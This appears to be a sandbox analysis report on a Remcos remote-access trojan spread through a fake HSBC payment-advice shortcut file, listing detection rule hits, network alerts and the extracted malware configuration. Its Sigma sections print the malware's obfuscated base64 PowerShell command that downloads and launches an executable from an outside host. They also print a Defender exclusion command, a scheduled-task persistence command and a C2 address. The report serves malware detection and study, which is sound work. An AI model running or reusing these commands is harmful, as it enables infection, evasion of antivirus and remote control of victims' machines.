12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdd000:$a1: Remcos restarted by watchdog! 0x152240:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd558:$a3: %02i:%02i:%02i:%03i 0x152798:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd8dd:$a4: * Remcos v 0x152b1d:$a4: * Remcos v
12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6f20:$s1: \Classes\mscfile\shell\open\command 0xd6f80:$s1: \Classes\mscfile\shell\open\command 0x14c160:$s1: \Classes\mscfile\shell\open\command 0x14c1c0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6f68:$s2: eventvwr.exe 0x14c1a8:$s2: eventvwr.exe
3.2.PuttyTest777.pif.37293a8.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.PuttyTest777.pif.37293a8.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdd000:$a1: Remcos restarted by watchdog! 0x152240:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd558:$a3: %02i:%02i:%02i:%03i 0x152798:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd8dd:$a4: * Remcos v 0x152b1d:$a4: * Remcos v
3.2.PuttyTest777.pif.37293a8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6f20:$s1: \Classes\mscfile\shell\open\command 0xd6f80:$s1: \Classes\mscfile\shell\open\command 0x14c160:$s1: \Classes\mscfile\shell\open\command 0x14c1c0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6f68:$s2: eventvwr.exe 0x14c1a8:$s2: eventvwr.exe
Click to see the 31 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" , ParentImage: C:\Users\user\AppData\Roaming\PuttyTest777.pif, ParentProcessId: 2108, ParentProcessName: PuttyTest777.pif, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif", ProcessId: 6180, ProcessName: powershell.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine|base64offset|contains: >, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6856, ParentProcessName: cmd.exe, ProcessCommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ProcessId: 7020, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine|base64offset|contains: >, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6856, ParentProcessName: cmd.exe, ProcessCommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ProcessId: 7020, ProcessName: powershell.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" , CommandLine: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\PuttyTest777.pif, NewProcessName: C:\Users\user\AppData\Roaming\PuttyTest777.pif, OriginalFileName: C:\Users\user\AppData\Roaming\PuttyTest777.pif, ParentCommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7020, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" , ProcessId: 2108, ProcessName: PuttyTest777.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" , ParentImage: C:\Users\user\AppData\Roaming\PuttyTest777.pif, ParentProcessId: 2108, ParentProcessName: PuttyTest777.pif, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp", ProcessId: 7276, ProcessName: schtasks.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine|base64offset|contains: >, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6856, ParentProcessName: cmd.exe, ProcessCommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ProcessId: 7020, ProcessName: powershell.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , CommandLine|base64offset|contains: >, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6856, ParentProcessName: cmd.exe, ProcessCommandLine: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g , ProcessId: 7020, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7108, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" , ParentImage: C:\Users\user\AppData\Roaming\PuttyTest777.pif, ParentProcessId: 2108, ParentProcessName: PuttyTest777.pif, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp", ProcessId: 7276, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 9B 9A 85 2C AD 0E 2F 7E E9 73 AC 9B C0 D0 32 9C 79 B1 91 DF 68 20 99 C8 6B 27 5A 7D A0 5A D5 49 BE AE EF 1D FB 34 83 FF 77 DB 78 F0 C5 EE E8 2C 33 A7 DB 88 FB B7 12 BC C3 D9 EC 44 4B CC 27 6A 15 18 DD C3 2C 4A C7 78 DE 6F 6B B6 2F 8E E4 2C A3 01 FE 77 CD 0A CA 5B 73 32 C9 C5 03 B0 35 B3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\PuttyTest777.pif, ProcessId: 7424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O7QOC3\exepath

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.4 - Destination IP: 178.237.33.50

Timestamp:	2024-07-26T13:03:14.929874+0200
SID:	2803304
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 192.254.232.209

Timestamp:	2024-07-26T13:03:08.232870+0200
SID:	2019714
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET JA3 Hash - Remcos 3.x/4.x TLS Connection - Source IP: 192.168.2.4 - Destination IP: 204.10.160.230

Timestamp:	2024-07-26T13:03:13.537766+0200
SID:	2036594
Source Port:	49734
Destination Port:	7983
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T13:04:03.833862+0200
SID:	2022930
Source Port:	443
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T13:03:25.459572+0200
SID:	2022930
Source Port:	443
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "204.10.160.230:7983:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-O7QOC3", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Source: Payment Advice__HSBC Banking.pdf.lnk	Virustotal: Detection: 37%			Perma Link
Source: Payment Advice__HSBC Banking.pdf.lnk	ReversingLabs: Detection: 31%

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1759395246.000000000104A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 2108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7812, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Payment Advice__HSBC Banking.pdf.lnk

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

17_2_004315EC

